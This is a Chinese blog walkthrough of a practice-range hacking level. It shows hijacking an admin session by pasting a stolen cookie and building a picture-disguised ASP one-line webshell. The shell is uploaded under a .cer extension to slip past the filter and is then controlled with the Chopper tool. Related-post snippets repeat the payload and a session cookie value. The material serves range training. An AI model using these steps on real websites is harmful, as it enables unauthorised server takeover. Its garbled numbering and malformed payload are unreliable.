第四章:进击,拿到Web最高权限

已于 2023-09-20 09:07:59 修改
阅读量1k 收藏 1
点赞数 2
分类专栏: 靶场学习 文章标签: 网络安全 渗透测试 安全 web安全
于 2022-01-04 23:09:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48294281/article/details/122313770
版权

1.根据前关已经得到了cookie,现在需要修改cookie达到登录系统的目的。

2.打开网站,以谷歌浏览器为例,F12打开控制台,找到Application,对图中3  4的值进行修改,修改的内容为你获取到的cookie的内容,3 4分别对应cookie中 “=”左右的内容。

3.修改后点击“准备好了吗”或者刷新页面,因为cookie已经被修改,顺利登录系统。

4.准备菜刀工具,菜刀的下载可以去bilibili自己搜索,有UP主做了详细视频

5. 获取到可上传文件类型

7.看到cer文件,考虑asp一句话木马,新建记事本添加代码:<%eval request%(”a”)>,文件保存1.php,下载图片另存为1.png,使用cmd命令制作图片木马:copy 1.png+1.php 2.png,看到生成的2.png文件后,修改其后缀为.cer

6.上传文件,菜刀链接。

7.找到tips提示文件,下载到桌面。

8.拿到通关flag

Blong~
关注
专栏目录
python核心编程之开门见山,带你了解Python后的大背景
LYX_WIN
12-02 1074
Python 是一门优雅而健壮的编程语言,它继承了传统编译语言的强大性和通用性,同时也 借鉴了简单脚本和解释语言的易用性。它可以帮你完成工作,而且一段时间以后,你还能看明 白自己写的这段代码。你会对自己如此快地学会它和它强大的功能感到十分的惊讶,更不用提 你已经完成的工作了!只有你想不到,没有 Python 做不到。
封神台----尤里的复仇I-第五章:进击拿到Web最高权限
正在学习的路上...
07-18 1947
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
第四章进击拿到Web最高权限
m0_51195235的博客
01-03 442
第四章进击拿到Web最高权限
[CTF夺旗赛] BUUCTF N1BOOK 第二章 web进阶
最新发布
Da1NtY的博客
08-23 1259
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第二章,后续会陆续更新。
封神台 第四章进击拿到Web最高权限(绕过防护上传木马)
m0_65712192的博客
10-19 1823
封神台 第四章进击拿到Web最高权限(绕过防护上传木马)
封神台-第四章进击拿到Web最高权限!【配套课时:绕过防护上传木马 实战演练】
08-04 2242
题目: Tips: 1、通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情 尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,看到了后台功能! 接下来要做的,就是找一个上传点,上传自己的shell了! ...
获取最大权限
weixin_30270561的博客
01-22 103
发现这么段儿代码,更改用户权限的, 当然,我是没敢试,呵呵,自己愿意的可以玩儿玩儿 data: l_USR04 LIKE USR04 , l_UST04 LIKE UST04 , l_PROFS LIKE USR04-PROFS , l_USRBF2 like USRBF2 occurs 0 with header line, l_userid like usr01-bname. T...
封神台靶场-第五章
Mr_helloword的博客
07-11 1906
第五章- 进击拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4379
针对环境 windows有两种环境,一种是web网站拿到webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
HTTP和Web缓存
wu371894545的博客
03-03 1万+
1.HTTP概述 场景:想象一下你是木叶村的火影,现在你想同砂忍村的风影建交。你必须指派一名忍者来传达建交文书,为确保文书的完好,你指派的忍者必须非常可靠,无论遇到多么危险的情况,都能准确完好地将文书传达到风影手里。这名忍者叫卡卡西,啊不,叫HTTP(数据传输协议)。 现在知道了吧,HTTP就是一个可靠的信使。即使你在北极,将数据传达到南极,HTTP也会完整地将数据传递过去。 在
深入解析OkHttp3
热门推荐
一个码农的博客
01-08 6万+
OkHttp是一个精巧的网络请求库,有如下特性: 1)支持http2,对一台机器的所有请求共享同一个socket 2)内置连接池,支持连接复用,减少延迟 3)支持透明的gzip压缩响应体 4)通过缓存避免重复的请求 5)请求失败时自动重试主机的其他ip,自动重定向 6)好用的API其本身就是一个很强大的库,再加上Retrofit2、Picasso的这一套组合拳,使其愈发的受到开发者的关注
封神台-第5章 绕过防护上传木马
ploto_cs的博客
09-27 732
封神台-第5章 绕过防护上传木马 1.登录后台 获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了 键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在这个页面按F12 进入存储界面,更改name和value字段 将ADMINSESSIONIDCSTRCSDQ粘贴在Name下 将LBMLMBCCNPFINOANFGLPCFBC粘贴在value 修改成功后刷新点击“准备好了吗” 进入以下页
笔记本电脑如何获得html管理员权限,笔记本电脑怎么样获取最高管理员权限
weixin_42366752的博客
07-16 626
在Windows系统下,系统的操作权限是有一定的限制的,一般用户登录的账户都是普通管理员,因此很多操作都会受限,为了能拥有更高的操作能力,就必须获取最高的管理员权限,那么在Windows8系统下如何一键快速获取高级管理员权限呢?下面学习啦小编就以笔记本电脑为例子,跟大家分享具体的处理方法吧,希望对大家有所帮助~笔记本电脑获取最高管理员权限的方法第一步:在遇到权限限制的文件夹上右键鼠标,然后选择“属...
web权限方案
qq_43603719的博客
12-28 191
1.设置登陆的用户名和密码 第一种方式:通过配置文件 配置文件中设置用户名和密码 server.port=8022 spring.security.user.name=666 spring.security.user.password=666 第二种方式;通过配置类 @Configuration public class SecurityCongig extends WebSecurityConfigurerAdapter{ @Override protected void config
封神台-尤里的复仇Ⅰ
weixin_44522540的博客
02-20 872
封神台-尤里的复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录封神台-尤里的复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了更多的权限!留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
切换到真正的最高权限 SYSTEM 账户界面
12-23 6047
大家知道,SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows 桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Win
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1144
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值